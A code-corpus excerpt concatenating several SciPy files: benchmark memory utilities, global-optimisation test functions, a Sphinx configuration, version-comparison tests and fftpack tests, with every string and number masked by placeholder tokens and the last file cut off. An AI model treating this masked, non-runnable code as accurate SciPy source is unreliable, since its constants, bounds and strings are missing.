    if process.returncode != <NUM_LIT:0>:
        raise AssertionError("<STR_LIT>" % code)

    return duration, peak_memusage


def get_mem_info():
    """Parse the system memory info file (/proc-style ``key: value``
    lines) into a dict of lowercased keys mapped to scaled numeric
    values.  Linux-only."""
    if not sys.platform.startswith('<STR_LIT>'):
        raise RuntimeError("<STR_LIT>")

    info = {}
    with open('<STR_LIT>', '<STR_LIT:r>') as f:
        for line in f:
            p = line.split()
            # Strip the trailing colon from the key; scale the value
            # (presumably kB -> bytes — redacted constant; TODO confirm).
            info[p[<NUM_LIT:0>].strip('<STR_LIT::>').lower()] = float(p[<NUM_LIT:1>]) * <NUM_LIT>
    return info


def set_mem_rlimit(max_mem=None):
    """Cap this process's address space (RLIMIT_AS) at ``max_mem`` bytes,
    defaulting to a fraction of the detected system memory, and never
    raising an already-lower soft limit."""
    import resource
    if max_mem is None:
        mem_info = get_mem_info()
        max_mem = int(mem_info['<STR_LIT>'] * <NUM_LIT>)

    cur_limit = resource.getrlimit(resource.RLIMIT_AS)
    if cur_limit[<NUM_LIT:0>] > <NUM_LIT:0>:
        max_mem = min(max_mem, cur_limit[<NUM_LIT:0>])

    resource.setrlimit(resource.RLIMIT_AS, (max_mem, cur_limit[<NUM_LIT:1>]))


def with_attributes(**attrs):
    """Decorator factory: attach the given keyword attributes to the
    decorated function (used to tag benchmarks with metadata)."""
    def decorator(func):
        for key, value in attrs.items():
            setattr(func, key, value)
        return func
    return decorator
from __future__ import division, print_function, absolute_import

from numpy import atleast_2d, arange, sum, cos, exp, pi

from .go_benchmark import Benchmark

# NOTE(review): every class below stores ``zip(...)`` in ``self._bounds``.
# Under Python 3 that is a one-shot iterator, not a list — presumably the
# Benchmark base class materializes it; verify before reuse.


class Watson(Benchmark):
    r"""Watson objective function (6-dimensional by default)."""

    def __init__(self, dimensions=<NUM_LIT:6>):
        Benchmark.__init__(self, dimensions)

        self._bounds = zip([-<NUM_LIT>] * self.N, [<NUM_LIT>] * self.N)
        self.global_optimum = [[-<NUM_LIT>, <NUM_LIT>, -<NUM_LIT>, <NUM_LIT>, -<NUM_LIT>,
                                <NUM_LIT>]]
        self.fglob = <NUM_LIT>

    def fun(self, x, *args):
        self.nfev += <NUM_LIT:1>

        # Column vector of sample indices; a = i / const (sample points).
        i = atleast_2d(arange(<NUM_LIT>)).T
        a = i / <NUM_LIT>
        j = arange(<NUM_LIT>)
        k = arange(<NUM_LIT>)

        # Vectorized residuals over all sample points, then squared sum
        # plus the x[0]^2 regularizing term.
        t1 = sum((j + <NUM_LIT:1>) * a ** j * x[<NUM_LIT:1>:], axis=<NUM_LIT:1>)
        t2 = sum(a ** k * x, axis=<NUM_LIT:1>)

        inner = (t1 - t2 ** <NUM_LIT:2> - <NUM_LIT:1>) ** <NUM_LIT:2>

        return sum(inner) + x[<NUM_LIT:0>] ** <NUM_LIT:2>


class Wavy(Benchmark):
    r"""W / Wavy objective function (dimension-scalable)."""

    def __init__(self, dimensions=<NUM_LIT:2>):
        Benchmark.__init__(self, dimensions)

        self._bounds = zip([-pi] * self.N, [pi] * self.N)
        self.global_optimum = [[<NUM_LIT:0.0> for _ in range(self.N)]]
        self.fglob = <NUM_LIT:0.0>
        self.change_dimensionality = True

    def fun(self, x, *args):
        self.nfev += <NUM_LIT:1>

        # Mean of damped cosines, subtracted from 1.
        return <NUM_LIT:1.0> - (<NUM_LIT:1.0> / self.N) * sum(cos(<NUM_LIT:10> * x) * exp(-x ** <NUM_LIT> / <NUM_LIT>))


class WayburnSeader01(Benchmark):
    r"""Wayburn-Seader 1 objective function (2-dimensional)."""

    def __init__(self, dimensions=<NUM_LIT:2>):
        Benchmark.__init__(self, dimensions)

        self._bounds = zip([-<NUM_LIT>] * self.N, [<NUM_LIT>] * self.N)
        self.custom_bounds = ([-<NUM_LIT:2>, <NUM_LIT:2>], [-<NUM_LIT:2>, <NUM_LIT:2>])
        self.global_optimum = [[<NUM_LIT:1.0>, <NUM_LIT>]]
        self.fglob = <NUM_LIT:0.0>

    def fun(self, x, *args):
        self.nfev += <NUM_LIT:1>

        # Sum of two squared residuals.
        return (x[<NUM_LIT:0>] ** <NUM_LIT:6> + x[<NUM_LIT:1>] ** <NUM_LIT:4> - <NUM_LIT>) ** <NUM_LIT:2> + (<NUM_LIT:2> * x[<NUM_LIT:0>] + x[<NUM_LIT:1>] - <NUM_LIT:4>) ** <NUM_LIT:2>


class WayburnSeader02(Benchmark):
    r"""Wayburn-Seader 2 objective function (2-dimensional)."""

    def __init__(self, dimensions=<NUM_LIT:2>):
        Benchmark.__init__(self, dimensions)

        self._bounds = zip([-<NUM_LIT>] * self.N,
                           [<NUM_LIT>] * self.N)
        self.custom_bounds = ([-<NUM_LIT:1>, <NUM_LIT:2>], [-<NUM_LIT:1>, <NUM_LIT:2>])
        self.global_optimum = [[<NUM_LIT>, <NUM_LIT:1.0>]]
        self.fglob = <NUM_LIT:0.0>

    def fun(self, x, *args):
        self.nfev += <NUM_LIT:1>

        u = (<NUM_LIT> - <NUM_LIT:4> * (x[<NUM_LIT:0>] - <NUM_LIT>) ** <NUM_LIT:2> - <NUM_LIT:4> * (x[<NUM_LIT:1>] - <NUM_LIT>) ** <NUM_LIT:2>) ** <NUM_LIT:2>
        v = (x[<NUM_LIT:1>] - <NUM_LIT:1>) ** <NUM_LIT:2>
        return u + v


class Weierstrass(Benchmark):
    r"""Weierstrass objective function (dimension-scalable)."""

    def __init__(self, dimensions=<NUM_LIT:2>):
        Benchmark.__init__(self, dimensions)

        self._bounds = zip([-<NUM_LIT:0.5>] * self.N, [<NUM_LIT:0.5>] * self.N)
        self.global_optimum = [[<NUM_LIT:0.0> for _ in range(self.N)]]
        self.fglob = <NUM_LIT:0>
        self.change_dimensionality = True

    def fun(self, x, *args):
        self.nfev += <NUM_LIT:1>

        kmax = <NUM_LIT:20>
        a, b = <NUM_LIT:0.5>, <NUM_LIT>

        # k as a column vector so t1 broadcasts over all dimensions of x.
        k = atleast_2d(arange(kmax + <NUM_LIT:1.>)).T
        t1 = a ** k * cos(<NUM_LIT:2> * pi * b ** k * (x + <NUM_LIT:0.5>))
        # Constant offset term, scaled by the dimensionality.
        t2 = self.N * sum(a ** k.T * cos(pi * b ** k.T))

        return sum(sum(t1, axis=<NUM_LIT:0>)) - t2


class Whitley(Benchmark):
    r"""Whitley objective function (dimension-scalable)."""

    def __init__(self, dimensions=<NUM_LIT:2>):
        Benchmark.__init__(self, dimensions)

        self._bounds = zip([-<NUM_LIT>] * self.N,
                           [<NUM_LIT>] * self.N)
        self.custom_bounds = ([-<NUM_LIT:1>, <NUM_LIT:2>], [-<NUM_LIT:1>, <NUM_LIT:2>])

        self.global_optimum = [[<NUM_LIT:1.0> for _ in range(self.N)]]
        self.fglob = <NUM_LIT:0.0>
        self.change_dimensionality = True

    def fun(self, x, *args):
        self.nfev += <NUM_LIT:1>

        # Pairwise (i, j) interaction via row-vector / column-vector
        # broadcasting, then summed over both axes.
        XI = x
        XJ = atleast_2d(x).T

        temp = <NUM_LIT> * ((XI ** <NUM_LIT>) - XJ) + (<NUM_LIT:1.0> - XJ) ** <NUM_LIT>
        inner = (temp ** <NUM_LIT> / <NUM_LIT>) - cos(temp) + <NUM_LIT:1.0>
        return sum(sum(inner, axis=<NUM_LIT:0>))


class Wolfe(Benchmark):
    r"""Wolfe objective function (3-dimensional)."""

    def __init__(self, dimensions=<NUM_LIT:3>):
        Benchmark.__init__(self, dimensions)

        self._bounds = zip([<NUM_LIT:0.0>] * self.N, [<NUM_LIT>] * self.N)
        self.global_optimum = [[<NUM_LIT:0.0> for _ in range(self.N)]]
        self.fglob = <NUM_LIT:0.0>

    def fun(self, x, *args):
        self.nfev += <NUM_LIT:1>

        return <NUM_LIT:4> / <NUM_LIT:3> * (x[<NUM_LIT:0>] ** <NUM_LIT:2> + x[<NUM_LIT:1>] ** <NUM_LIT:2> - x[<NUM_LIT:0>] * x[<NUM_LIT:1>]) ** <NUM_LIT> + x[<NUM_LIT:2>]
<s> import sys , os , re <EOL> import sphinx <EOL> if sphinx . __version__ < "<STR_LIT>" : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> needs_sphinx = '<STR_LIT>' <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( os . path . dirname ( __file__ ) ) ) <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : <EOL> from matplotlib . sphinxext import plot_directive <EOL> except ImportError : <EOL> use_matplotlib_plot_directive = False <EOL> else : <EOL> try : <EOL> use_matplotlib_plot_directive = ( plot_directive . __version__ >= <NUM_LIT:2> ) <EOL> except AttributeError : <EOL> use_matplotlib_plot_directive = False <EOL> if use_matplotlib_plot_directive : <EOL> extensions . append ( '<STR_LIT>' ) <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' <EOL> import scipy <EOL> version = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , scipy . __version__ ) <EOL> release = scipy . __version__ <EOL> print "<STR_LIT>" % ( version , ) <EOL> today_fmt = '<STR_LIT>' <EOL> default_role = "<STR_LIT>" <EOL> exclude_dirs = [ ] <EOL> add_function_parentheses = False <EOL> show_authors = False <EOL> pygments_style = '<STR_LIT>' <EOL> themedir = os . path . join ( os . pardir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if os . path . 
isdir ( themedir ) : <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ themedir ] <EOL> if '<STR_LIT>' in tags : <EOL> html_theme_options = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT:right>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : [ ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> } <EOL> else : <EOL> html_theme_options = { <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT:left>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : [ ] <EOL> } <EOL> html_logo = '<STR_LIT>' <EOL> html_sidebars = { '<STR_LIT:index>' : '<STR_LIT>' } <EOL> else : <EOL> if '<STR_LIT>' in tags : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> html_style = '<STR_LIT>' <EOL> html_logo = '<STR_LIT>' <EOL> html_sidebars = { '<STR_LIT:index>' : '<STR_LIT>' } <EOL> html_title = "<STR_LIT>" % ( project , version ) <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_last_updated_fmt = '<STR_LIT>' <EOL> html_additional_pages = { } <EOL> html_use_modindex = True <EOL> html_copy_source = False <EOL> html_file_suffix = '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> mathjax_path = "<STR_LIT>" <EOL> _stdauthor = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , _stdauthor , '<STR_LIT>' ) , <EOL> ] <EOL> latex_preamble = r'''<STR_LIT>''' <EOL> latex_use_modindex = False <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> phantom_import_file = '<STR_LIT>' <EOL> numpydoc_use_plots = True <EOL> if sphinx . __version__ >= "<STR_LIT>" : <EOL> import glob <EOL> autosummary_generate = glob . glob ( "<STR_LIT>" ) <EOL> coverage_ignore_modules = r"""<STR_LIT:U+0020>""" . split ( ) <EOL> coverage_ignore_functions = r"""<STR_LIT>""" . split ( ) <EOL> coverage_ignore_classes = r"""<STR_LIT:U+0020>""" . 
split ( ) <EOL> coverage_c_path = [ ] <EOL> coverage_c_regexes = { } <EOL> coverage_ignore_c_items = { } <EOL> plot_pre_code = """<STR_LIT>""" <EOL> plot_include_source = True <EOL> plot_formats = [ ( '<STR_LIT>' , <NUM_LIT> ) , '<STR_LIT>' ] <EOL> plot_html_show_formats = False <EOL> import math <EOL> phi = ( math . sqrt ( <NUM_LIT:5> ) + <NUM_LIT:1> ) / <NUM_LIT:2> <EOL> font_size = <NUM_LIT> * <NUM_LIT> / <NUM_LIT> <EOL> plot_rcparams = { <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : font_size , <EOL> '<STR_LIT>' : ( <NUM_LIT:3> * phi , <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> if not use_matplotlib_plot_directive : <EOL> import matplotlib <EOL> matplotlib . rcParams . update ( plot_rcparams ) <EOL> import inspect <EOL> from os . path import relpath , dirname <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> try : <EOL> __import__ ( name ) <EOL> extensions . append ( name ) <EOL> break <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> print "<STR_LIT>" <EOL> def linkcode_resolve ( domain , info ) : <EOL> """<STR_LIT>""" <EOL> if domain != '<STR_LIT>' : <EOL> return None <EOL> modname = info [ '<STR_LIT>' ] <EOL> fullname = info [ '<STR_LIT>' ] <EOL> submod = sys . modules . get ( modname ) <EOL> if submod is None : <EOL> return None <EOL> obj = submod <EOL> for part in fullname . split ( '<STR_LIT:.>' ) : <EOL> try : <EOL> obj = getattr ( obj , part ) <EOL> except : <EOL> return None <EOL> try : <EOL> fn = inspect . getsourcefile ( obj ) <EOL> except : <EOL> fn = None <EOL> if not fn : <EOL> try : <EOL> fn = inspect . getsourcefile ( sys . modules [ obj . 
__module__ ] ) <EOL> except : <EOL> fn = None <EOL> if not fn : <EOL> return None <EOL> try : <EOL> source , lineno = inspect . getsourcelines ( obj ) <EOL> except : <EOL> lineno = None <EOL> if lineno : <EOL> linespec = "<STR_LIT>" % ( lineno , lineno + len ( source ) - <NUM_LIT:1> ) <EOL> else : <EOL> linespec = "<STR_LIT>" <EOL> fn = relpath ( fn , start = dirname ( scipy . __file__ ) ) <EOL> if '<STR_LIT>' in scipy . __version__ : <EOL> return "<STR_LIT>" % ( <EOL> fn , linespec ) <EOL> else : <EOL> return "<STR_LIT>" % ( <EOL> scipy . __version__ , fn , linespec ) </s>
<s> from numpy . testing import assert_ , run_module_suite , assert_raises <EOL> from scipy . _lib . _version import NumpyVersion <EOL> def test_main_versions ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < ver ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) > ver ) <EOL> def test_version_1_point_10 ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> def test_alpha_beta_rc ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < ver ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) > ver ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) > '<STR_LIT>' ) <EOL> def test_dev_version ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < ver ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> def test_dev_a_b_rc_mixed ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> def test_dev0_version ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < '<STR_LIT>' ) <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) < ver ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> def test_dev0_a_b_rc_mixed ( ) : <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) == '<STR_LIT>' ) <EOL> assert_ ( NumpyVersion ( '<STR_LIT>' ) 
< '<STR_LIT>' ) <EOL> def test_raises ( ) : <EOL> for ver in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_raises ( ValueError , NumpyVersion , ver ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> __usage__ = """<STR_LIT>""" <EOL> from numpy . testing import ( TestCase , assert_equal , assert_almost_equal , <EOL> assert_array_almost_equal , run_module_suite ) <EOL> from scipy . fftpack import ( diff , fft , ifft , tilbert , itilbert , hilbert , <EOL> ihilbert , shift , fftfreq , cs_diff , sc_diff , <EOL> ss_diff , cc_diff ) <EOL> import numpy as np <EOL> from numpy import arange , sin , cos , pi , exp , tanh , sum , sign <EOL> from numpy . random import random <EOL> def direct_diff ( x , k = <NUM_LIT:1> , period = None ) : <EOL> fx = fft ( x ) <EOL> n = len ( fx ) <EOL> if period is None : <EOL> period = <NUM_LIT:2> * pi <EOL> w = fftfreq ( n ) * <NUM_LIT> * pi / period * n <EOL> if k < <NUM_LIT:0> : <EOL> w = <NUM_LIT:1> / w ** k <EOL> w [ <NUM_LIT:0> ] = <NUM_LIT:0.0> <EOL> else : <EOL> w = w ** k <EOL> if n > <NUM_LIT> : <EOL> w [ <NUM_LIT> : n - <NUM_LIT> ] = <NUM_LIT:0.0> <EOL> return ifft ( w * fx ) . 
real <EOL> def direct_tilbert ( x , h = <NUM_LIT:1> , period = None ) : <EOL> fx = fft ( x ) <EOL> n = len ( fx ) <EOL> if period is None : <EOL> period = <NUM_LIT:2> * pi <EOL> w = fftfreq ( n ) * h * <NUM_LIT:2> * pi / period * n <EOL> w [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> w = <NUM_LIT> / tanh ( w ) <EOL> w [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> return ifft ( w * fx ) <EOL> def direct_itilbert ( x , h = <NUM_LIT:1> , period = None ) : <EOL> fx = fft ( x ) <EOL> n = len ( fx ) <EOL> if period is None : <EOL> period = <NUM_LIT:2> * pi <EOL> w = fftfreq ( n ) * h * <NUM_LIT:2> * pi / period * n <EOL> w = - <NUM_LIT> * tanh ( w ) <EOL> return ifft ( w * fx ) <EOL> def direct_hilbert ( x ) : <EOL> fx = fft ( x ) <EOL> n = len ( fx ) <EOL> w = fftfreq ( n ) * n <EOL> w = <NUM_LIT> * sign ( w ) <EOL> return ifft ( w * fx ) <EOL> def direct_ihilbert ( x ) : <EOL> return - direct_hilbert ( x ) <EOL> def direct_shift ( x , a , period = None ) : <EOL> n = len ( x ) <EOL> if period is None : <EOL> k = fftfreq ( n ) * <NUM_LIT> * n <EOL> else : <EOL> k = fftfreq ( n ) * <NUM_LIT> * pi / period * n <EOL> return ifft ( fft ( x ) * exp ( k * a ) ) . 
real <EOL> class TestDiff ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT:32> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> assert_array_almost_equal ( diff ( sin ( x ) ) , direct_diff ( sin ( x ) ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:2> ) , direct_diff ( sin ( x ) , <NUM_LIT:2> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:3> ) , direct_diff ( sin ( x ) , <NUM_LIT:3> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:4> ) , direct_diff ( sin ( x ) , <NUM_LIT:4> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:5> ) , direct_diff ( sin ( x ) , <NUM_LIT:5> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:2> * x ) , <NUM_LIT:3> ) , direct_diff ( sin ( <NUM_LIT:2> * x ) , <NUM_LIT:3> ) ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:2> * x ) , <NUM_LIT:4> ) , direct_diff ( sin ( <NUM_LIT:2> * x ) , <NUM_LIT:4> ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) ) , direct_diff ( cos ( x ) ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) , <NUM_LIT:2> ) , direct_diff ( cos ( x ) , <NUM_LIT:2> ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) , <NUM_LIT:3> ) , direct_diff ( cos ( x ) , <NUM_LIT:3> ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) , <NUM_LIT:4> ) , direct_diff ( cos ( x ) , <NUM_LIT:4> ) ) <EOL> assert_array_almost_equal ( diff ( cos ( <NUM_LIT:2> * x ) ) , direct_diff ( cos ( <NUM_LIT:2> * x ) ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x * n / <NUM_LIT:8> ) ) , direct_diff ( sin ( x * n / <NUM_LIT:8> ) ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x * n / <NUM_LIT:8> ) ) , direct_diff ( cos ( x * n / <NUM_LIT:8> ) ) ) <EOL> for k in range ( <NUM_LIT:5> ) : <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:4> * x ) , k ) , direct_diff ( sin ( <NUM_LIT:4> * x ) , k ) ) <EOL> assert_array_almost_equal ( diff ( cos ( <NUM_LIT:4> 
* x ) , k ) , direct_diff ( cos ( <NUM_LIT:4> * x ) , k ) ) <EOL> def test_period ( self ) : <EOL> for n in [ <NUM_LIT> , <NUM_LIT:64> ] : <EOL> x = arange ( n ) / float ( n ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:2> * pi * x ) , period = <NUM_LIT:1> ) , <EOL> <NUM_LIT:2> * pi * cos ( <NUM_LIT:2> * pi * x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:2> * pi * x ) , <NUM_LIT:3> , period = <NUM_LIT:1> ) , <EOL> - ( <NUM_LIT:2> * pi ) ** <NUM_LIT:3> * cos ( <NUM_LIT:2> * pi * x ) ) <EOL> def test_sin ( self ) : <EOL> for n in [ <NUM_LIT:32> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> assert_array_almost_equal ( diff ( sin ( x ) ) , cos ( x ) ) <EOL> assert_array_almost_equal ( diff ( cos ( x ) ) , - sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:2> ) , - sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , <NUM_LIT:4> ) , sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( <NUM_LIT:4> * x ) ) , <NUM_LIT:4> * cos ( <NUM_LIT:4> * x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( sin ( x ) ) ) , cos ( x ) * cos ( sin ( x ) ) ) <EOL> def test_expr ( self ) : <EOL> for n in [ <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT:100> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] [ : <NUM_LIT:5> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> f = sin ( x ) * cos ( <NUM_LIT:4> * x ) + exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> df = cos ( x ) * cos ( <NUM_LIT:4> * x ) - <NUM_LIT:4> * sin ( x ) * sin ( <NUM_LIT:4> * x ) + <NUM_LIT:3> * cos ( <NUM_LIT:3> * x ) * exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> ddf = - <NUM_LIT> * sin ( x ) * cos ( <NUM_LIT:4> * x ) - <NUM_LIT:8> * cos ( x ) * sin ( <NUM_LIT:4> * x ) - <NUM_LIT:9> * sin ( <NUM_LIT:3> * x ) * exp ( sin ( <NUM_LIT:3> * x ) ) + <NUM_LIT:9> * cos ( <NUM_LIT:3> * x ) ** <NUM_LIT:2> * exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> d1 = diff ( f ) <EOL> assert_array_almost_equal ( d1 , df ) 
<EOL> assert_array_almost_equal ( diff ( df ) , ddf ) <EOL> assert_array_almost_equal ( diff ( f , <NUM_LIT:2> ) , ddf ) <EOL> assert_array_almost_equal ( diff ( ddf , - <NUM_LIT:1> ) , df ) <EOL> def test_expr_large ( self ) : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> f = sin ( x ) * cos ( <NUM_LIT:4> * x ) + exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> df = cos ( x ) * cos ( <NUM_LIT:4> * x ) - <NUM_LIT:4> * sin ( x ) * sin ( <NUM_LIT:4> * x ) + <NUM_LIT:3> * cos ( <NUM_LIT:3> * x ) * exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> ddf = - <NUM_LIT> * sin ( x ) * cos ( <NUM_LIT:4> * x ) - <NUM_LIT:8> * cos ( x ) * sin ( <NUM_LIT:4> * x ) - <NUM_LIT:9> * sin ( <NUM_LIT:3> * x ) * exp ( sin ( <NUM_LIT:3> * x ) ) + <NUM_LIT:9> * cos ( <NUM_LIT:3> * x ) ** <NUM_LIT:2> * exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> assert_array_almost_equal ( diff ( f ) , df ) <EOL> assert_array_almost_equal ( diff ( df ) , ddf ) <EOL> assert_array_almost_equal ( diff ( ddf , - <NUM_LIT:1> ) , df ) <EOL> assert_array_almost_equal ( diff ( f , <NUM_LIT:2> ) , ddf ) <EOL> def test_int ( self ) : <EOL> n = <NUM_LIT:64> <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> assert_array_almost_equal ( diff ( sin ( x ) , - <NUM_LIT:1> ) , - cos ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , - <NUM_LIT:2> ) , - sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , - <NUM_LIT:4> ) , sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( <NUM_LIT:2> * cos ( <NUM_LIT:2> * x ) , - <NUM_LIT:1> ) , sin ( <NUM_LIT:2> * x ) ) <EOL> def test_random_even ( self ) : <EOL> for k in [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ] : <EOL> for n in [ <NUM_LIT> , <NUM_LIT:32> , <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> f = diff ( diff ( f , <NUM_LIT:1> ) , - <NUM_LIT:1> ) <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> 
assert_array_almost_equal ( diff ( diff ( f , k ) , - k ) , f ) <EOL> assert_array_almost_equal ( diff ( diff ( f , - k ) , k ) , f ) <EOL> def test_random_odd ( self ) : <EOL> for k in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( diff ( diff ( f , k ) , - k ) , f ) <EOL> assert_array_almost_equal ( diff ( diff ( f , - k ) , k ) , f ) <EOL> def test_zero_nyquist ( self ) : <EOL> for k in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] : <EOL> for n in [ <NUM_LIT:32> , <NUM_LIT> , <NUM_LIT:64> , 